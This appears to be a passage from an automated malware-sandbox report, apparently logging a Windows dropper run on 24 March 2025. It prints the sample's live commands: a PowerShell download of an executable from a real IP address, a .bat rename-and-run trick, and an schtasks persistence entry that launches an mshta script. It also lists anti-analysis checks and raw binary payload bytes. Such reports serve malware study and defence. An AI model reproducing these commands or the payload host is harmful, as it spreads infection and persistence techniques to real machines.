1ûÓò$_ÿ2HÖýÎ¿ñµ/1þµ1/ìZÀò¦wbÄ=Îè¡ ÉH$!Ç;þ)æ;¢ðÊ÷áÌ) É0¸Õª_6<Ó ®·{Ä¶ºø:¥æ#ZÙ£?ôÚe w`\o9
Data received	ëû¾ÿf~¬4A?21uÂdõìTÇ´±_ùÆ ]ÊTÚÐÜÔø=ÁàðcJ÷Úù÷Ï TJZ«-¶o[ÙS ÏGd}ºÀ§{- L»ßÞ`Ýò!÷yÇkU[_~ 2júû5hkñ ö- }v³ ö¯:²¿®Å¸IBõ26²¿P²Ô%»VåD_^-â¦ß)R[YPÐM]¸Ä 1è®ÎÅ\cw.=:°bËFôYï{Ð·ÁøI'ý?Ã%µÀ×¨Oý× -ºCûq°e ^ÿ4Z[²AØ%~5¶û=åÂø;h®ôì[óÊËQ²_!$)®º©õc;Ú¨fV Âwo¹ßB`ªökPP'%û}ê4<ÀTó3ý °CÐã¦b1þr^ùà{ü2^âÞÒ³`»ñ[ßOzèåf`ðªu%Åø¯~ÿÐÎ/-ìÜ¼/Q£àp½Ï}gsço¾ÙQq]5ãºaQ-z§´hç¿9ì¬zîþ?ð«ÿÀ\|í¹Së_³êÓÓá~Y "ò® ,X!U7lbrÆ÷H}\y-!Üâo¨ÂAòÆ;QhÞ%OCÞ©IX¯9ÃSu1»ÌYÑÁXg{aP½ÅY Ç©_~Qï)®þ;õ]økàü{ÿ ñ.DáHR 2 _Þ¸ºïÿT!Bjíúoª}è%BË'ª5ø\|çl×³Jh\þ"u¬_c[Üï?eô½"«I@i&Þ_9¾9 _ D »öà-Z8½þ¬ÿx#K.åbÌRhòG%¿]ðþCâBbK0 òWÆ=h`m þ';¥ß\|@Ô:wgº-qÙ©ãV½ñø9ê·~¯O Çæj»4µ`¿ø_Iû@}³þ:OÁB6;vG¸ÆÔ>1º9kýÜHùí^'2Íw-Zh4ôÄ÷"r 16?õð^V\|æ!¬¸9-ºkÜwBñ\ÿsvB ëA<½/]ïÊÁVç[óÇK¬ù+ÀU¥£½î/®8@C¼ÇöÅ!Ï(ÐëA Ý»ûgÔNúTvåõ½§EÇnþ¿¾õGõïávÇãÁ´øópZ·¨çÊsçÜïµR³/ë]QÆfèOVï(PB¸H~4_zÁ0dÎ/EíêsÄWüq§+ cF/Vöø;MÞb1Ñá{kZ\û&/pÿÁ\|ÅD¨-5û XÕg'h+]WXù¼þé,X¿ÜÛV·su ³È°¡ä%o~bÉ_pÙ-ÓA°GïSJK¼ ¾)l@µú&ª$¹ºäVU_Ám¸Ó\|õ\|½Ï÷WIU÷:áñaËj ¯óxI'ßÏýMª·oIQMFhn- q¯Y³î=z1v[ñu¿Ó· th°Ó!ÎÍç`ª}uP÷0ÐH-éBøV('×¯}qg#N8üÄR¼\ &ì{ &B$V=$KÍ-Õ@X ÎvÆ2÷¥KmèV%åP·Àõ[xïÛó/øùwü®0yWùPöLUOÒ<õ}½«k 1R8Ë¼h^(-q&zt¦4l?ßÝXû/ó¨ê?Háþ)²ÑuaaRoü´üeÝ^]T·Nê( S(#À;ze[hlÔøïóH-'¢ßî¡°hN^{¤GÝbýVáX%2XL_IR@5oºèÊàú ÐÕZÅÏ-1bÌ!´å ÀÃê^Ë~¨\¼\¤ LEíImðøë¢Q%ÂéaöÌ%×ujÃÕÍÅ-ÂhÎ\|$Ú&ôúÆ}zÄ^(^Y¬j¤ªÅçKê=¶ÒïiS/óÉÌPRéöãåìHø>¸-ejAðºÕçê2ùÁ×~jWöèFAnº¿ÒhZw@-Ç2{JîL8ÙF;ËØHàJ5\|ÍoC=î1½~wýøA]býþªÎIO¾+ZsbÚmLtÒ²ÌKkõÖ7$ùVXµ,b/Õ»%ÐgójÉ¤×<·\')JSToæ ²Z\|í-®Fs°¨0UCVÁ_¢<qójè ëà0ìyScYKÎûO öMX}ÅQ'Q;ë~#°2µõJRK8àp5(@×0ÅX¼ö}ÿó:ä¼íµúG?[õ°Í-¤éªóoNð&Rà\|àÛ%}]É-À.ä-UÃlË_xõ¼íÆsLÓùÁÔÜëU ÕÅ2»1õúæ4ÀhèTb¤ÒvÏ³^ß¬]@-&ÅÂ¾ZÍÏ_)è¢vèÏÝéô}0#£¨¾%¼?ÿ h§6²Ñ÷2QH ã,î7´Ë.R·ÒÆ-ÿZ~ü@h²>O7ë^CÅ?¸3ãã\oÁ&Wÿ9p¯¯Axs+\ ß4.Ah¶Ävëç±Æ"Qäö[ïÎ/VÜA;s9Âv~`ÖåqH]'j`¯°ív3»>-¯V rò¼HÞA.2[îM÷ÖF®´-%û\|5í;îÈ¼£U7¬À©VêµWkFúf°Ì¾ oïà9n)%ÃòÖÊè]Áøûio$'ãz[%¾ÿy<Â hzé-IdM?á£Ô`¾[¨¶½:¢îÒÿg^©`d¡ cI}vô÷OÑÈANÕM¤ðlº>ñ¡hD>©ÓÝûKw´2 ÀÿsÌÑ'ï7/© `¢Fè_é<¥ÿo¹AÆóàþmP×PîY¿ó)/ÓfãPRS[1êÌßZzX\Þ([7&atíÇà¯2pÆ=µÑG'9ïÂÓ°¼NV¨Î#Z¿?i<,&ÖIõyòçµ1½üÈmTi?NÞk.ËÌGtvJ1}l£/UTÅæ¥]E,'Y@b´=¿qzDþª-0î&b³ õ¿%^øM:ýâù¿Dò8Äû¡µ.ü^ùNÖF§ eënËÚõ»ØXeúýùÒùJªfÇ )ôÿD±Ëù¢ CbóÖ%·GëÂ¤þ~)£Ñä;oÈ¤sëLeMóÃ£{h}¢P,=%«Iµ.u1ÐKkvL å²ñð. µ~ù,lC!"{j@¸ùZÓ%(ÐJ(Ã[!Å;ÊQJü¤¢¨)ñùþ^ù¬0·F6Áì©Ï-PæcÔ a7ñ÷.À]Uÿ=J¾4Ë«Ra®9x~ÎÇjv^ ¿} [ps½²è~3Á¿cP½¥?á0h/jéW0ëtß:K×éíÆý)Ì\|¬ÅR¸¨ó¾Ù3;ú#Íí¶Cõèa6ësîLÃ£[øçÔîøÇ?k«`1þ
Data received	ÜwÏ´09Ô_2nß±tãÜg 9Û¶ÇsZ@4<ö¡dÏ=ñ¤8r´pVòRè³ÄöÁ,°È¦ÜIôÌÆÓ÷%?[9$Ç°96dMteÊ¬õñ¨dp0Ü14ÛP/YxßlóAéÂ@ä×@ êL6Ü;mìeö»by´hô^> `" $82¸aÛ@uþÉ^Uìæõ\#}të'`¸20N¼Î.æ4@ÅáßC@·íZËã1"ÛÚ±îv® éhË÷¾ÎföÅ±e=¹2äv0xÌ´P ý«Xèû/eÁ¬ÙÇ¤¼Ñi¯opß7 ¹·Ç4$Ó9&f.ì@Æ¦mJCWÒxÏ ËV¸çÀq¹3R-Z«¸Ö!<fq°Çmìv2ÀÞV@p¨öÐC±÷?¹¤ÀäÔËÈ¼æT²Rdúo°÷!H@»jk±Ôm<[íý\~%ëùªÔÀ×k¸`!®¡ìj7ßV¡ÜX,ìïQ,wðo¼´Ñ8¸Ñ_<·y[S÷\`¤îñúAÙ0Ø¼ [ð±ôÚwôán9Ã_YyØI.¬Ã Ü ¬tÝ±TkM ü©>(Â¢TÔH&Àe{1d9PÔÿÖ÷Çdm(:i ° nAHQPïX~\|I¸ÒÔím6ïÞÁ\|ß(T"t$¡émè(Þ:ð èYëzC\wE þ<°S99Ìß+²ì¾§lLøs½>ñ((jrH®tËÉ( nµàY,`oQK¤t·9ôÖs~L¼É@a3ATLß \|Ùôèâ1iÉu±-0ÿÀ~ò`¬ÅK+æ«îxd½c¹ñzÖ @ðáøx¸Àé98ç ¹À\|ÔRS½ußJ§´ö³2ª{6 Zt>o¢3ÂsvV¼IcP]Ò^ S ØÔç³?ýñR\ÜvoPi:0åbv2_$\¾°RÈö>ÃÑþß ã&`$÷â`r-\|`ô£qjâÐ§´ÉÚm.Â¹7 ÐÈø@dà¸Ï±üRÅ°0@uËÐ0=Ü!-jôl89¾¡Rt<á3ofÁ=<Xú`vHþÜÖDÔN j`´ÜY 88 hça¸TäËvî»>°ÜzK'Ôò`Ù3·¾¬äú8è² ½µ>0xN ðâÿè«Ø&ç<` )x?à8ÚøfiÀ³1P-ªéxemå)0ÜÐô?¯dßê¸Ätúæ6ZkOYZ4¦«Q²Wý lN $U%'Ä¸òðipeÎö¹Özh À!l9>rQ,Á^BÊôØ»DóCz¼´ts¼pÂy¹V`aý]¡z0Øä©·`7[ÔøøürÙ >¸L´@p1Ýìðj¤³Z=ÅlI®ðyÖÐ+ÉsD'àæ?i5ås´ÕÅUH)¸}¨$j¤ãúuppÌÄ>\¸ëÿ¸´ÓÅAX¬ÅLfñb¾PÙð0[Y2sÇÛ)½D<·@B8xgÇnfß¹$¹;8°Æm¬¤%Üß<^XM= \|KR×Ùé4-\|veÕVöe°ø¼Á´-3Û9$Â ã`R[ÆÀËjõ3P°PK©`ÜÐ°Ú©Ä{108éË±æûkHJ@ã1Ô´-ùiÄ0D¬¼8Éöð@E¾4´=xåäþÙæf<7£PNÂl` 9jô@ýõÜB/#K¸f$~°¬ÅðÖþèÇK¹5·º¥!áQöÿ}ðtì4-à=HØ¬õah3ª OIsÜÜTN2KÄ¤Û¸ö d gÇÝ¬o^ÛLEÜyüKhç¨t_!Ò= $Ì¸ó-4²Dà)8 Û %b-¿!Àm^@4: ©¡CLpá<9'iÜÌàpÞ&ýÚv`·64è"ßÁDë 0×\|´r:µ5¯ç ß_h÷«@\´ÞâµSöàÅN¢4( ü ÓÏ¥q´Â±\|Hõ]ë=°ål\|v.Ü5¥H>³ßÑ?b,%ZHµ ¼iße±$Ü/4þîVÎ`âyHý2ò8² è¬"Ñ >xâÐ pøÜr4°öÀ@´Ñh³æF÷#'zoO}ÂTÕH¶²6Ô%Q¬ºº\|¥z´0 ´>Õå'·ro&KXX)?ô´È° v.ÜÔyK`"À¸¹¶©á qßþM¿\|$ÏLÀ÷ÇÜjÅBõeÁ¨dÏ67ÌN"Ü<Èp¾@À3ªÑP`JÐïËÛKµA÷Å#l»p1ÎQ}_$Ýu`¸ïr9ªín¨-.¼¼1»¤ä,öXo#Ó÷´`Ei8²Î'"lßì¶E°¸Ø¤ÊMp` mß+ÌX\wc¸û ÜE¶¹äHð ¸ù xß;0.÷Á8ÌðKÕxÐ¾dÊ7».î¼p@´wÌu(Þì©qõèaä© ÷Ó 2¸(bDO6ÌØé}<õRÃ?0åÓIVUÇYØÈ¹í#O^"Ä°3;ïµ(ð(bi¬ ³9¸à @»UÌ`æÐ×0Å9`Ü µ0ûès^<Y@°Îéuý(:-¼²xcÔyfÉ{²eø9¼àoÕk´jÚ0ÿTB7ågÖ¹?ßÀ¿wefxL Pªì`j/Ð´ÐuÃ¡ôñÒ(°¿`ÂP4À5iÉé!âMÀÔ¡'xpàîµ[ÞÇñø¦äN®g>æ°HxM½Ë\9ÀlÎY5q 8÷î<µ,á¹]`wD¡±hxÅ}KäÔ9 xQÌ×hÜh È_ªPm¨x(xÏÐ¯«ñk( Bþ0å¼-hì!?ÈD5>(¸ÀÅwòg (µöÿC½:{7H3¤Ñä<Y ¯kÐø¨¢¬Ï ¿âlp4èüùZN Í¨éi Ç¼ßEôÌ" ¾8×ìo¶ÔZ È.Üô}{Ýsd°6áÑrð Rñ<è°`1Bò\ä>øñahô Ç¿Êà¢ Ü8«¤ÃÄ?÷ñj&ÜM!ãÍ@Î¯\ðÅ£üJ²Ðjß\°f<¨®um¸æP J° èÕ!¶¹sä+"'íD¸P¡ürrnì¸¸K,ô±ÔðOÚNt,®°6·8Ü¤0Ò7¯æøLÉûÆÝÕm`¼¸ñ$u§Å¬tÒ¼dèpbÄÔu`¸jTà÷Á>T.D9¥=QfÜÁk&®í¼`ÔA~ÜµaÖàtßÎhÅè1÷ RÔÏ-Up!(Ax0ägÎ¬êNðÜ%#È1û W4=ßöpi:Ryf 3©ü(èñmQàè2Ð A?°x;ì·RßªÒð¡4hËÑÜÎTg¿ál¶À;9^¤H8Þn§Á`¸ÊÕ°,è`~!ï«ÜÝ`ø_wàNAÔÚ¼FÕAø«Ô¼@º>í\|1°Ñ0á/ÐÈõôd@Ðµb_^Myr\3À9n_pCa´Ü¹öÍ»·FÜ¼Ñ;XéÐð¸ó:^D±ìñZ0ÈVp]æ°t\|U8ªLòg(?ßêQ¹°-À°½´:Lù8 0Üü>_$65&È4E&1ø4ï @^¢ÜvhxÅ¡fn ÄÙi¸5riQ´à0ãðLÆèì·îÂÜø¤×Ì;îW2`¸D0o";ùÁÊ!d¶Ô"¹®¥ÍÆëS0ÇçC÷»qê/RÒõâ!'¼zm¦&ÿÖ+DýId¬Ê`Î»fUçjO ü}Ü´»AÌÞ£cuâh ê{l8Ðl¢Ü$tçF%à<Re$ÀTâ8{î@mÍL¨}t-ä3 18} À0*ìW¼þÏñÛa-IÞn.1ÖðÉ Ï
Data received	6ånYÞ3( 8ìã7#AàâÔC/ÀêWY°Ëðä(¤ØøY¿_(ÓD $ê]ºy¹bULÐ?\|t[ÃBx8>åëJAþ§äÛP». ÉÏ_[¢a\ÀU?%þO§¡ço§ß¤YTÒÚ1íQyH¬ÇÉãù¼[qøÇí±&1z$UG6ÛYO· a%wp §«\|«×;þÔ -LAxPKL lX,ÏèL»'k¼Jìy VäDñÙ´èÀÂyÏ£¬ë¬À0ø ¼ù´¡ìÂ²'§¦à<èëMåp4ñ¨ïQ0@W ÏÓÐYÀÚ{Åä!Ç9£²Ñ Px± W¤Dþý49¬XÉ[ÓHE<É^1 TRo¤U[ù`@Bx>°çå( ÎäíÄ"Ä±'¬` näÜ8`ÀrsZ RE#Ö [Ð»CÛMhüwd¢Ó\;Ð±ÝÝ $`©huZ¹W@ù³äõ¼G¤È¹Pëªì à¿íI:XþÆï@DøëHípÖ:DVÓÝÈÔÎ[æP¨º/§1Õ ¿[5Ïú¢'Í¿ íÌO¬ØhÓ ÷Üèðx(¦YíçÕí#T ÀÏ¸P[®Ñ¬Zn$ø¡ ¹ Tz)YÇéÔF!ÀÉI´Õ444@õGÝâ@xPÚ"°P ¯À¹´éß]SFÛP $´Ô@°2íøábR¤¤__Y0Bë8Î`ÈÅê«î ýGèRª44ÀÉI: ôøýìX¡$CÊ\óì`¥'D^1[G!÷ë¨Ñ´L¥í²Ôak±>ÞtÇ¤RÙ©êë¼4^µ0p¢ðØ [38 ²ltéë_\ä!T'@ÜèóDû©;ÜMVh~W"ÿªY¥@ÙZ$(ÇívÓB§ð>8´Ù»~(Ò1×'«xÉ=A(x1¸Éª69ØcLp& 4DcdèPáÈ]D,õëô]}Ø½N4°ê@@ø>¬îëNÓWzÒÔÆ(¿X ÌÓþ ÍoOî@êÓÀ1,ëd¨Pò&àaàÎÃ äØnØ8-°Wÿ§Û0ØÑù¦ä0MÍá÷eáU»4Ï=âÞ)vèPÌªéR«°~4TOHùcü°Ô&RíêÜ ò8L°Â¨WE;)»¦8<M`6±hfÀ÷êI»iX¼ÌÝØlpTÃZ¶þis n_&QâµqV»°`èa1p="Õ:HNÆ2;AÒà°s¾ÓÁ^ ae[¶¤ÉxeA´hîWõ ¦(¹\|Ç\|~`R;?.x(èSMhfì»x¹îü<³Ä½T9ThÏxiYÂÁÙd(øÂ©Óí©É¨¼qfY$[8 ùa\|ðÇÒÖCì çÔ Á½!n£`±í¢Põ u/®9 ÌùÞTpaë²>r$[Â\WÄtL½øpMÙ\|¦àëý¼]SA¸4&ÎBY¼DÀñ?O»æð\HøÚL$ àíwD/^°Ø»#$êHÌ¥3hÈ]Ñ ¹ÐÂ[Mèò,a!ãê×7 Bø\IjãÊÿëà9\Ì` èêM \|R[}À`@ó¡òøG¨ÈRõ2J¼ÁT!<>@H%î<Jþ [AP_6èÔ Få@]ÏöÜº°<»<èµN¸ ôÙV@¬aPè$æÈ[I´¬Yýqq¬HnÈØÊø½äÈèêïXÉÜ)ÂØ¥ÐE`Ô5b,¨¾0\&NÒP/+È¼n¦À&êP»!ÅE4 `ÕdlMÏë`8Y@c Ôºèd0 k%m}¬EÈ´À]ê\~²XÀ9hý\|'s XÐ¬$¬ A&AjCÄïëSé,Vä ¬$±H7DV´YÄ¦È ôºh«$b"óY)@ £s½[=¼ÐD°öGåÜ8 lÝt%ÄdPYq4õG$ÏeÅÖè@@dÛá·¹ @HÝ`ìðû±Ì¬iüa ¼I_Ð[µè&ÉaÔÆx\ ´ëÓñÕy£¸ò´è&¡[Ðø'ºXíë½âE@;2a`@ì4S>üÍB¤õ¶RàæÎ0\/Aabèvé,íX5`hüêë³ >»HôHTÀkÜjüPùt6øèY$L,RXè_YÙþ¹ë\ÇúXpPþµówÀT¬Þ¦cd òëe$aÓP4ì¶È&ç±ÃkX$Ì4¡Rd I]xÃ±HH¶KjÝB`HÃÅZXå£´`;Õim¶,WµèMxÄ,¼ÄTO{=Òç\ZÊl¬êK<í À ÄS¸` 0ðù&s4Â0ËÞw1: ÚEøXH}\À¥«1Öé@ ì}Àü4{Üã×³Ò(O-ÚaÂPÈSD¥¡é0-&E^`TuWIú¸ÊÑà@Ä6î¡9}Øü±wsì¯àáÌ0ÿ{!ð±ñh´ï)ì§J»Ì#.ÜhÉ8(4GUØl¢1ýÜ5:äs¦wÌWrdj{lT£©C4_É¨+ÜÄôz°0ë^1ñjF È1$3'AÔRãøgê.LÄ>rÁxßàÔ è¾`(å5<Áýa!+oª$ùÅ9J¼»øJÇZOåw Ä: Í_ô/ÒÜP¿¬r@I¨ËcoáYý2GÇbÆ©g%LÌ¡QºÆ ÕhHdÒz¨¬/¤ÓÛÜÅUfKqíB Ü±XkrCÅb°x«ù %Ï£¨o©M¨¦T:Ø òQI`¨x(%ðÇÌÍüðO´.ß;náÔyØÝGìå Ó¦Ø ê Ãñ·~* $ÔPÎ[ûxÉK£7`ì/uá\_RÈ¶¢#P.¾ê0Ïæ2Ôòö½µ5ÇcLHÜùÜ&Þ»dpRÑìÀ¼ âØ°/ñ5pF3øF(J (BH¤}AØ`G© ¡ù^Ã ðí6MèS(æà\Ë"W ê©áÞæòBÅ(^&ðp 3ôäGMq0Þh°-jðøäQH`K¨¤Rç ¢.{údìµ>X9ÌÇk¤}U(ëÌÐðÈ¬Þ¢ Æ½ b»5#KJ`1í¦ÑH§2 )a3 `l(bvßDÛtÕSQ1ÅîLÙ¢°dÈ)ì

Poweshell is sending data to a remote host (1 event)

Data sent

GET /mine/random.exe HTTP/1.1 Host: 176.113.115.7 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW March 24, 2025, 10:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 24, 2025, 10:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 24, 2025, 10:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

system

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	C:\Windows\System32\cmd.exe /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
cmdline	"C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
cmdline	tasklist
cmdline	schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f
cmdline	C:\Windows\system32\cmd.exe /c schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f

Communicates with host for which no DNS query was performed (2 events)

host	176.113.115.6
host	176.113.115.7

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 720 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA March 24, 2025, 10:39 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA March 24, 2025, 10:39 a.m.	class_name: OLLYDBG window_name:		0	0

A process attempted to delay the analysis task. (2 events)

description	rapes.exe tried to sleep 1696 seconds, actually delayed analysis time by 1696 seconds
description	advnrNo.exe tried to sleep 1331 seconds, actually delayed analysis time by 1331 seconds

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (3 events)

file	C:\Windows\Tasks\rapes.job
cmdline	schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f
cmdline	C:\Windows\system32\cmd.exe /c schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send March 24, 2025, 10:39 a.m.	buffer: GET /mine/random.exe HTTP/1.1 Host: 176.113.115.7 Connection: Keep-Alive socket: 1424 sent: 78	1	78	0

An executable file was downloaded by the processes powershell.exe, rapes.exe (4 events)

Time & API	Arguments	Status	Return
recv March 24, 2025, 10:39 a.m.	buffer: HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 01:39:15 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 24 Mar 2025 01:17:20 GMT ETag: "1db000-6310c5d9f93c1" Accept-Ranges: bytes Content-Length: 1945600 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ñ¶BS×,×,×,¼/×,¼)/×,Ç¢(×,Ç¢/×,Ç¢)Ì×,¤Ñ×,¼(×,¼-×,×-g×,Y¢%×,Y¢Ó×,Y¢.×,Rich×,PEL#»gàòÂ@M@pM9Z@WàkÐH\|)M,)M ÀÖ@à.rsrcHÐæ@À.idata àì@À +ðî@àakiehyda 2ð@àpwemnwqq0M@à.taggant0@M"@à received: 2920 socket: 1424	1	2920
InternetReadFile March 24, 2025, 10:39 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd ^"àgð"ðØl@À`\|(ÀÎ@E hà@h.textîð `.rdata´ö@@.data @À.pdataÀ@@.gxfg à²@@.retplne Ä_RDATAô Æ@@.reloch È@B.idata0 Ð@ÀAWAVAUATVWUSHìH¦H1àH$T$pHL$hÇD$déÑ[ÇD$`T$pHL$hT$0èÐT$0òÿâ<OT¼A¸ÿÿÿÿEÁAñ<OT¼DT$0E!ÊEÃAóÿÿÿÿAã<OT¼AáÿÿÿÿD ÒE ËD1ÚòÿòÿÿÿÿâÿEÁAñÿÿÿÿAáÿÿÿÿEÂAòÿÿÿÿAâÿÿÿÿE ÑDT$0AòÿAñÿEÃAóÇE ÊAËÇAòÿE!ÚAÑE!ÑD1ÒA ÑÂòÿâÿÿÿÿEÂAòÿÿÿÿAÃE!ÓD ÚEÊAòÿAâ³¢ÃEÃAó³¢ÃE!ÙDÆöÿÿÿÿæ³¢ÃAãÿÿÿÿE ÊD ÞA1òEÁAñæt~Aáé`wáEÃAóé`wáDÞææt~DÇ÷ÿÿÿÿçé`wáAãÿÿÿÿA ñD ßA1ùAÓAóÿDÖöÿDÇ÷;+HÔDÛã;+HÔ!úõå;+HÔA!ú ÓD Õ1ëA óAóÿÏ;+HÔA!ûD ÛDÊâæt~Añæt~D ÊAÙAñÿAá <×MEÂAò <×MD!ÓEÃAóÿÿÿÿAã <×MAâÿÿÿÿA ÙE ÓE1ÙAñÿòÿEÂAò=}A ÑAÊ=}AñÿE!ÑÂòÿâÿÿÿÿEÂAòÿÿÿÿAÃE!ÓD ÚòÿòÔ³ÓâÔ³ÓEÂAòÔ³ÓAâÿÿÿÿEÃAóÿÿÿÿAãÔ³ÓE ÚEÓAóÿÆD1Þ!ÆDÀ5ÿÿÿÿ%ÿÿÿÿEÃAóÿÿÿÿAãÿÿÿÿD ØEÃAóÔ³ÓÇD1ß!ÇDÀ5ÿÿÿÿAòÿEÃAó<D ÐAË<ðÿD!ØAÒA!ò1òA ÒúòÿAÃAóÿDÆö]±gÓã]±g!÷DÝå]±g!ð û Å1ëD ÚòÿÎ]±g!ò ÓDÐðÿÚ!ÂóÿA!ÚD ÒD$0ðÿ%É>? EÂAòÉ>? D\$0E!ÓDÆöÿÿÿÿæÉ>? AâÿÿÿÿD ØD Ö1ðAÒAòÿAâÿÿÿÿEÃAóÿÿÿÿD!ÚA ÒDÂò©Ððâ\|ÓùpEÃAó\|ÓùpDÞæ©ÐðDÇ÷ÿÿÿÿç\|ÓùpAãÿÿÿÿ òD ß1úAÃE!ÓD1ÐA ÃÐ%©Ððò©Ðð 